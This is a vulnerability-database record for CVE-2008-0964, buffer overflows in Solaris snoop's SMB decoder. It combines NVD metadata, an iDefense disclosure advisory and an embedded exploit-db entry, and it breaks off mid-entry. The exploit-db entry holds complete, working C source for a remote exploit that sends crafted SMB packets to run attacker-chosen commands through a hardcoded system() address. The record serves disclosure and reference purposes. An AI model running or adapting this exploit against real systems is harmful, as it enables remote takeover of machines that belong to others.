ID CVE-2008-0964Type cveReporter NVDModified 2018-10-30T12:25:15
Description
Multiple stack-based buffer overflows in snoop on Sun Solaris 8 through 10 and OpenSolaris before snv_96, when the -o option is omitted, allow remote attackers to execute arbitrary code via a crafted SMB packet.
{"id": "CVE-2008-0964", "bulletinFamily": "NVD", "title": "CVE-2008-0964", "description": "Multiple stack-based buffer overflows in snoop on Sun Solaris 8 through 10 and OpenSolaris before snv_96, when the -o option is omitted, allow remote attackers to execute arbitrary code via a crafted SMB packet.", "published": "2008-08-08T14:41:00", "modified": "2018-10-30T12:25:15", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0964", "reporter": "NVD", "references": ["http://www.securitytracker.com/id?1020633", "https://exchange.xforce.ibmcloud.com/vulnerabilities/44222", "http://www.securityfocus.com/bid/30556", "http://support.avaya.com/elmodocs2/security/ASA-2008-355.htm", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-240101-1", "https://www.exploit-db.com/exploits/6328", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=734", "http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=766935", "http://www.vupen.com/english/advisories/2008/2311"], "cvelist": ["CVE-2008-0964"], "type": "cve", "lastseen": "2018-11-01T05:11:55", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:sun:solaris:9::x86", "cpe:/o:sun:solaris:10", "cpe:/o:sun:solaris:9::sparc", "cpe:/o:sun:opensolaris:build_snv_95", "cpe:/o:sun:opensolaris:build_snv_91", "cpe:/o:sun:opensolaris", "cpe:/o:sun:opensolaris:build_snv_92", "cpe:/o:sun:opensolaris:build_snv_01", "cpe:/o:sun:solaris:8::x86", "cpe:/o:sun:opensolaris:build_snv_22", "cpe:/o:sun:opensolaris:::sparc", "cpe:/o:sun:opensolaris:build_snv_19", "cpe:/o:sun:solaris:8::sparc", "cpe:/o:sun:opensolaris:::x86", "cpe:/o:sun:opensolaris:build_snv_02", "cpe:/o:sun:solaris:9", "cpe:/o:sun:solaris:10::x86", "cpe:/o:sun:opensolaris:build_snv_13", "cpe:/o:sun:solaris:10::sparc", "cpe:/o:sun:solaris:8", "cpe:/o:sun:opensolaris:build_snv_88", "cpe:/o:sun:opensolaris:build_snv_89", "cpe:/o:sun:opensolaris:build_snv_64"], "cvelist": ["CVE-2008-0964"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Multiple stack-based buffer overflows in snoop on Sun Solaris 8 through 10 and OpenSolaris before snv_96, when the -o option is omitted, allow remote attackers to execute arbitrary code via a crafted SMB packet.", "edition": 1, "enchantments": {}, "hash": "216ae119ca5cff91c5a3c2713bdfd73143b60145d93833acb08db1984fdb0b3b", "hashmap": [{"hash": "db032637bf71059acbcfd20ebf573a68", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "a8f314aca7a0b53434c4ec0b4524f34a", "key": "scanner"}, {"hash": "8d4dcb8e6c74416628b3bd2bb3eddd03", "key": "references"}, {"hash": "dbae43b937ee5cdb576531806c8eaa8e", "key": "modified"}, {"hash": "474fca02c27da2068aa07215c16be8ce", "key": "title"}, {"hash": "4e7c1895fdf4534511b1b65e76a5ae44", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "77e38a68167416c4847f0926823040f2", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "cfadc83a4de3dbaaf709bfdd068efb87", "key": "href"}, {"hash": "50730795175d34cebb4f45af9b313c04", "key": "assessment"}, {"hash": "559385bb732d9b82f70d0f6a58940c0a", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0964", "id": "CVE-2008-0964", "lastseen": "2016-09-03T10:12:16", "modified": "2011-03-07T00:00:00", "objectVersion": "1.2", "published": "2008-08-08T14:41:00", "references": ["http://www.securitytracker.com/id?1020633", "http://www.securityfocus.com/bid/30556", "http://support.avaya.com/elmodocs2/security/ASA-2008-355.htm", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-240101-1", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=734", "http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=766935", "http://xforce.iss.net/xforce/xfdb/44222", "http://www.vupen.com/english/advisories/2008/2311", "http://www.milw0rm.com/exploits/6328"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2008-0964", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T10:12:16"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:sun:solaris:9::x86", "cpe:/o:sun:solaris:10", "cpe:/o:sun:solaris:9::sparc", "cpe:/o:sun:opensolaris:build_snv_95", "cpe:/o:sun:opensolaris:build_snv_91", "cpe:/o:sun:opensolaris", "cpe:/o:sun:opensolaris:build_snv_92", "cpe:/o:sun:opensolaris:build_snv_01", "cpe:/o:sun:solaris:8::x86", "cpe:/o:sun:opensolaris:build_snv_22", "cpe:/o:sun:opensolaris:::sparc", "cpe:/o:sun:opensolaris:build_snv_19", "cpe:/o:sun:solaris:8::sparc", "cpe:/o:sun:opensolaris:::x86", "cpe:/o:sun:opensolaris:build_snv_02", "cpe:/o:sun:solaris:9", "cpe:/o:sun:solaris:10::x86", "cpe:/o:sun:opensolaris:build_snv_13", "cpe:/o:sun:solaris:10::sparc", "cpe:/o:sun:solaris:8", "cpe:/o:sun:opensolaris:build_snv_88", "cpe:/o:sun:opensolaris:build_snv_89", "cpe:/o:sun:opensolaris:build_snv_64"], "cvelist": ["CVE-2008-0964"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Multiple stack-based buffer overflows in snoop on Sun Solaris 8 through 10 and OpenSolaris before snv_96, when the -o option is omitted, allow remote attackers to execute arbitrary code via a crafted SMB packet.", "edition": 2, "enchantments": {}, "hash": "de252d7b40254c68493116bd289ea24e53886440b40115d248435c2391ac3543", "hashmap": [{"hash": "db032637bf71059acbcfd20ebf573a68", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "3c69160d6f9ea9c6283de11f903617e4", "key": "references"}, {"hash": "a8f314aca7a0b53434c4ec0b4524f34a", "key": "scanner"}, {"hash": "474fca02c27da2068aa07215c16be8ce", "key": "title"}, {"hash": "4e7c1895fdf4534511b1b65e76a5ae44", "key": "cpe"}, {"hash": "6d4074b73361cbd0a9548dc7ee92e5b2", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "77e38a68167416c4847f0926823040f2", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "cfadc83a4de3dbaaf709bfdd068efb87", "key": "href"}, {"hash": "50730795175d34cebb4f45af9b313c04", "key": "assessment"}, {"hash": "559385bb732d9b82f70d0f6a58940c0a", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0964", "id": "CVE-2008-0964", "lastseen": "2017-08-08T11:24:31", "modified": "2017-08-07T21:29:47", "objectVersion": "1.3", "published": "2008-08-08T14:41:00", "references": ["http://www.securitytracker.com/id?1020633", "https://exchange.xforce.ibmcloud.com/vulnerabilities/44222", "http://www.securityfocus.com/bid/30556", "http://support.avaya.com/elmodocs2/security/ASA-2008-355.htm", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-240101-1", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=734", "http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=766935", "http://www.vupen.com/english/advisories/2008/2311", "http://www.milw0rm.com/exploits/6328"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2008-0964", "type": "cve", "viewCount": 0}, "differentElements": ["references", "assessment", "modified"], "edition": 2, "lastseen": "2017-08-08T11:24:31"}, {"bulletin": {"assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:sun:solaris:9::x86", "cpe:/o:sun:solaris:10", "cpe:/o:sun:solaris:9::sparc", "cpe:/o:sun:opensolaris:build_snv_95", "cpe:/o:sun:opensolaris:build_snv_91", "cpe:/o:sun:opensolaris", "cpe:/o:sun:opensolaris:build_snv_92", "cpe:/o:sun:opensolaris:build_snv_01", "cpe:/o:sun:solaris:8::x86", "cpe:/o:sun:opensolaris:build_snv_22", "cpe:/o:sun:opensolaris:::sparc", "cpe:/o:sun:opensolaris:build_snv_19", "cpe:/o:sun:solaris:8::sparc", "cpe:/o:sun:opensolaris:::x86", "cpe:/o:sun:opensolaris:build_snv_02", "cpe:/o:sun:solaris:9", "cpe:/o:sun:solaris:10::x86", "cpe:/o:sun:opensolaris:build_snv_13", "cpe:/o:sun:solaris:10::sparc", "cpe:/o:sun:solaris:8", "cpe:/o:sun:opensolaris:build_snv_88", "cpe:/o:sun:opensolaris:build_snv_89", "cpe:/o:sun:opensolaris:build_snv_64"], "cvelist": ["CVE-2008-0964"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Multiple stack-based buffer overflows in snoop on Sun Solaris 8 through 10 and OpenSolaris before snv_96, when the -o option is omitted, allow remote attackers to execute arbitrary code via a crafted SMB packet.", "edition": 3, "enchantments": {"score": {"modified": "2017-09-29T14:25:46", "value": 9.3, "vector": "NONE"}}, "hash": "794bc0d0e0d921fc31226ca592e7fedf0351640e028b50a1b3e4d220defc6352", "hashmap": [{"hash": "db032637bf71059acbcfd20ebf573a68", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "d81156f73dc83fcc595c179f9b27484c", "key": "references"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6fa3bd6d10438aab347bdd65a8e4ac42", "key": "modified"}, {"hash": "a8f314aca7a0b53434c4ec0b4524f34a", "key": "scanner"}, {"hash": "474fca02c27da2068aa07215c16be8ce", "key": "title"}, {"hash": "4e7c1895fdf4534511b1b65e76a5ae44", "key": "cpe"}, {"hash": "e79993f566f9ea38f5ce6b878d9ed5f1", "key": "assessment"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "77e38a68167416c4847f0926823040f2", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "cfadc83a4de3dbaaf709bfdd068efb87", "key": "href"}, {"hash": "559385bb732d9b82f70d0f6a58940c0a", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0964", "id": "CVE-2008-0964", "lastseen": "2017-09-29T14:25:46", "modified": "2017-09-28T21:30:31", "objectVersion": "1.3", "published": "2008-08-08T14:41:00", "references": ["http://www.securitytracker.com/id?1020633", "https://exchange.xforce.ibmcloud.com/vulnerabilities/44222", "http://www.securityfocus.com/bid/30556", "http://support.avaya.com/elmodocs2/security/ASA-2008-355.htm", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-240101-1", "https://www.exploit-db.com/exploits/6328", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=734", "http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=766935", "http://www.vupen.com/english/advisories/2008/2311"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2008-0964", "type": "cve", "viewCount": 2}, "differentElements": ["modified", "cpe"], "edition": 3, "lastseen": "2017-09-29T14:25:46"}], "edition": 4, "hashmap": [{"key": "assessment", "hash": "e79993f566f9ea38f5ce6b878d9ed5f1"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "5db31ab16bb9b4daac06c52c18a2f2e7"}, {"key": "cvelist", "hash": "77e38a68167416c4847f0926823040f2"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "db032637bf71059acbcfd20ebf573a68"}, {"key": "href", "hash": "cfadc83a4de3dbaaf709bfdd068efb87"}, {"key": "modified", "hash": "ffd1e5eeb13c120011f534b0b078fd39"}, {"key": "published", "hash": "559385bb732d9b82f70d0f6a58940c0a"}, {"key": "references", "hash": "d81156f73dc83fcc595c179f9b27484c"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "a8f314aca7a0b53434c4ec0b4524f34a"}, {"key": "title", "hash": "474fca02c27da2068aa07215c16be8ce"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "43cf1d7ef8cf465ed5159e73a6eb2ef41491b9fe41a88364113bb584b1a4a95b", "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-11-01T05:11:55"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "cpe": ["cpe:/o:sun:solaris:9::x86", "cpe:/o:sun:sunos:5.8", "cpe:/o:sun:solaris:9::sparc", "cpe:/o:sun:opensolaris:build_snv_95", "cpe:/o:sun:opensolaris:build_snv_91", "cpe:/o:sun:opensolaris", "cpe:/o:sun:opensolaris:build_snv_92", "cpe:/o:sun:opensolaris:build_snv_01", "cpe:/o:sun:solaris:8::x86", "cpe:/o:sun:opensolaris:build_snv_22", "cpe:/o:sun:opensolaris:::sparc", "cpe:/o:sun:opensolaris:build_snv_19", "cpe:/o:sun:solaris:8::sparc", "cpe:/o:sun:opensolaris:::x86", "cpe:/o:sun:opensolaris:build_snv_02", "cpe:/o:sun:solaris:10::x86", "cpe:/o:sun:opensolaris:build_snv_13", "cpe:/o:sun:sunos:5.10", "cpe:/o:sun:sunos:5.9", "cpe:/o:sun:solaris:10::sparc", "cpe:/o:sun:opensolaris:build_snv_88", "cpe:/o:sun:opensolaris:build_snv_89", "cpe:/o:sun:opensolaris:build_snv_64"], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:5318", "name": "oval:org.mitre.oval:def:5318", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}
{"exploitdb": [{"lastseen": "2016-01-31T23:39:08", "osvdbidlist": ["47421"], "references": [], "description": "Sun Solaris <= 10 snoop(1M) Utility Remote Exploit. CVE-2008-0964. Remote exploit for solaris platform", "edition": 1, "reporter": "Andi", "published": "2008-08-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "Sun Solaris <= 10 snoop1M Utility Remote Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0964"], "modified": "2008-08-29T00:00:00", "id": "EDB-ID:6328", "href": "https://www.exploit-db.com/exploits/6328/", "sourceData": "/***********************************************************\n * hoagie_snoop.c\n * SUN SOLARIS SNOOP REMOTE EXPLOIT\n * + Sun Solaris 8/9/10\n * + OpenSolaris < snv_96\n *\n * Bug discovered by Gael Delalleau\n * http://www.securityfocus.com/bid/30556\n *\n * attack:/exploits# ./hoagie_snoop -t 192.168.0.1\n * hoagie_snoop.c - solaris snoop remote\n * -andi / void.at\n *\n * [*] attacking 'SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc' on '192.168.0.1' ...\n * [*] execute 'uname -a > /tmp/.patch.your.system.txt' now ...\n * [*] done\n * attack:/exploits#\n *\n * admin@opensolaris:~# snoop port 445\n * Using device pcn0 (promiscuous mode)\n * sh[1]: \u00c3\u00af\u00c2\u00bf\u00c5\u201cSMBr: not found [No such file or directory]\n * WARNING: received signal 11 from packet 1\n * ^Cadmin@opensolaris:~# cat /tmp/.patch.your.system.txt\n * SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc Solaris \n * admin@opensolaris:~#\n *\n * !!!UND IMMER DEINE FREUNDE, IHR NEHMT DOCH ALLE DROGEN!!!\n *\n * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-\n * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY\n * DAMAGE DONE USING THIS PROGRAM.\n *\n * VOID.AT Security\n * andi@void.at\n * http://www.void.at\n *\n ************************************************************/\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <string.h>\n#include <netdb.h>\n#include <time.h>\n#include <arpa/inet.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <netinet/tcp.h>\n\n#define MAX_PACKET\t\t4096\n#define SMB_COMMAND_TRIGGER\t0x72\n#define SMB_PORT_DEFAULT\t445\n#define SMB_TARGET_DEFAULT\t\"127.0.0.1\"\n#define\tSMB_HEADER_FILLER\t0x20\n\nstruct target_t {\n char *description;\n int address;\n} targets [] = {\n {\n /* -r-xr-xr-x 1 root bin 580460 2008-04-27 03:51 /usr/sbin/snoop */\n \"SunOS 5.11 snv_86 i86pc i386\",\n /* system() address */\n 0xd2adc2a0\n },\n\n {\n /* -r-xr-xr-x 1 root bin 529956 Nov 13 2006 /usr/sbin/snoop */\n \"SunOS 5.10 Generic_118833-33 sun4u sparc\",\n /* system() address */\n 0xff1a7c00\n },\n\n {\n NULL,\n 0,\n }\n};\n\n/* usage\n * display help screen\n */\nvoid usage(int argc, char **argv) {\n int i;\n\n printf(\"usage: %s [-i <id>] [-t <host>] [-c <command>]\\n\"\n \"\\n\"\n\t \"-i id for target\\n\"\n \"-t host running snoop\\n\"\n\t \"-c command to execute\\n\"\n \"\\n\\n\"\n\t \"available ids:\\n\"\n ,\n argv[0]);\n for (i = 0; targets[i].description != NULL; i++) {\n printf(\"%2d : %s\\n\", i, targets[i].description);\n }\n exit(1); \n}\n\n/* create_smb_packet\n */\nvoid send_smb_packet(int s,\n struct sockaddr_in *sin,\n char smbcommand,\n\t\t char *content) {\n\n char *packet = (char*)malloc(MAX_PACKET);\n int length = 0;\n struct tcphdr *tcp;\n char *data;\n int r;\n\n if (packet) {\n memset(packet, 0, MAX_PACKET);\n\n tcp = (struct tcphdr*)packet;\n tcp->source = sin->sin_port;\n tcp->dest = sin->sin_port;\n tcp->doff = sizeof(struct tcphdr) / 4;\n tcp->ack = 1;\n tcp->psh = 1;\n tcp->window = htons(32768);\n\n data = packet + sizeof(struct tcphdr);\n\n length = 4;\n\n strcpy(data + length, \"\\xffSMB\");\n length += 4;\n\n /* smb command */\n data[length++] = smbcommand;\n\n /* status */\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n\n /* flags */\n data[length++] = 0x18;\n\n /* flags2 */\n data[length++] = 0x80;\n data[length++] = 0x01;\n\n /* extra field */\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n\n /* tid */\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n\n /* client process id */\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n\n /* uid */\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n\n /* mid */\n data[length++] = SMB_HEADER_FILLER;\n data[length++] = SMB_HEADER_FILLER;\n\n /* word count */\n data[length++] = SMB_HEADER_FILLER;\n\n /* byte count */\n data[length++] = strlen(content) & 0xff;\n data[length++] = (strlen(content) >> 8) & 0xff;\n\n data[length++] = 0x02;\n\n if (content) {\n /* content */\n strcpy(data + length, content);\n length += strlen(content);\n }\n data[length++] = 0x00;\n\n /* set length for smb data */\n data[3] = (length - 4) & 0xff;\n data[2] = ((length - 4) >> 8) & 0xff;\n\n /* send packet */\n r = sendto(s, packet, sizeof(struct tcphdr) + length, 0,\n (struct sockaddr*)sin, sizeof(struct sockaddr_in));\n }\n\n}\n\n/* main entry\n */\nint main(int argc, char **argv) {\n char c;\n char *target = SMB_TARGET_DEFAULT;\n int port = SMB_PORT_DEFAULT;\n int s = 0;\n struct sockaddr_in sin;\n int i = 0;\n char buffer[1024];\n int idx = 0;\n char *command = NULL;\n\n printf(\"hoagie_snoop.c - solaris snoop remote\\n\"\n \"-andi / void.at\\n\\n\");\n\n if (argc < 2) {\n usage(argc, argv);\n } else {\n while ((c = getopt (argc, argv, \"hvt:p:r:i:c:\")) != EOF) {\n switch (c) {\n case 't':\n target = optarg;\n break;\n case 'p':\n port = atoi(optarg);\n break;\n case 'i':\n idx = atoi(optarg);\n break;\n case 'c':\n\t command = optarg;\n\t\t break;\n default:\n printf(\"[*] unknown command line option '%c'\\n\", c);\n exit(-1);\n }\n }\n }\n\n s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);\n if (s == -1) {\n printf(\"[*] failed to create raw socket\\n\");\n } else {\n sin.sin_family = AF_INET;\n sin.sin_port = htons(port);\n sin.sin_addr.s_addr = inet_addr(target);\n \n if (!command) {\n command = \"uname -a > /tmp/.patch.your.system.txt\";\n }\n \n printf(\"[*] attacking '%s' on '%s' ...\\n\", targets[idx].description, target);\n \n snprintf(buffer, sizeof(buffer), \";%s;\", command);\n \n /* char dialect[256] */\n for (i = strlen(buffer); i < 256; i++) { buffer[i] = SMB_HEADER_FILLER; }\n \n /* int bytecount */\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n \n /* int length */\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n \n /* dummy address */\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n \n /* framepointer / ebp */\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n buffer[i++] = SMB_HEADER_FILLER;\n \n /* return address */\n buffer[i++] = targets[idx].address & 0xff;\n buffer[i++] = (targets[idx].address >> 8) & 0xff;\n buffer[i++] = (targets[idx].address >> 16) & 0xff;\n buffer[i++] = (targets[idx].address >> 24) & 0xff;\n \n printf(\"[*] execute '%s' now ...\\n\", command);\n \n send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER, buffer);\n \n printf(\"[*] done\\n\");\n \t \n close(s);\n }\n\n return 0;\n}\n\n// milw0rm.com [2008-08-29]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6328/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "references": [], "description": "iDefense Security Advisory 08.04.08\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nAug 04, 2008\r\n\r\nI. BACKGROUND\r\n\r\nThe snoop command line utility is installed by default on Solaris. It is\r\nused to capture and display network traffic, similar to the widely used\r\ntcpdump program. Server Message Block (SMB), is a network protocol used\r\nfor Microsoft Windows file sharing. More information can be found on the\r\nvendor's website at the following URL.\r\n\r\nhttp://docs.sun.com/app/docs/doc/816-0211/6m6nc677k?a=view\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of multiple stack-based buffer overflow\r\nvulnerabilities in Sun Microsystems Inc.'s snoop could allow an\r\nattacker to execute arbitrary code with the privileges of the nobody\r\nuser.\r\n\r\nMultiple buffer overflow vulnerabilities exist within the code that\r\nparses and displays SMB traffic. In most cases, exploitation is trivial\r\nas an attacker has full control of the data copied.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of these vulnerabilities results in the execution of\r\narbitrary code with the privileges of the nobody user. In addition, the\r\nattacker has access to the raw socket used by the snoop program. This\r\nallows them to capture any traffic visible to the network interface\r\nused.\r\n\r\nOften in client-side vulnerabilities, an attacker only has a single\r\nchance to exploit the vulnerability. However, the snoop utility will\r\nhandle any segmentation violations and attempt to continue capturing\r\nnetwork traffic. This gives an attacker multiple opportunities to\r\nexploit a vulnerability, which increases the likelihood of successful\r\nexploitation.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of these vulnerabilities in snoop\r\nfor Solaris 10 8/07. Other versions may also be affected.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for these issues.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nSun Microsystems has addressed these vulnerabilities with the release of\r\npatches for Solaris 8, 9, and 10, as well as OpenSolaris. For more\r\ninformation, refer to Sun Alert 240101 at the following URL.\r\n\r\nhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-240101-1\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2008-0964 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/24/2008 Initial vendor notification\r\n01/25/2008 Initial vendor response\r\n08/04/2008 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThese vulnerabilities were reported to iDefense by Gael Delalleau.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2008 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "reporter": "Securityvulns", "published": "2008-08-12T00:00:00", "title": "iDefense Security Advisory 08.04.08: Solaris snoop SMB Decoding Multiple Stack Buffer Overflow Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-0964"], "modified": "2008-08-12T00:00:00", "id": "SECURITYVULNS:DOC:20331", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20331", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "references": ["https://vulners.com/securityvulns/securityvulns:doc:20331", "https://vulners.com/securityvulns/securityvulns:doc:20330"], "description": "Format string vulnerability on SMB traffic parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2008-08-12T00:00:00", "title": "Sun Solaris snoop format string vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:30", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Solaris", "version": "8", "operator": "eq"}, {"name": "Solaris", "version": "9", "operator": "eq"}, {"name": "Solaris", "version": "10", "operator": "eq"}], "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], 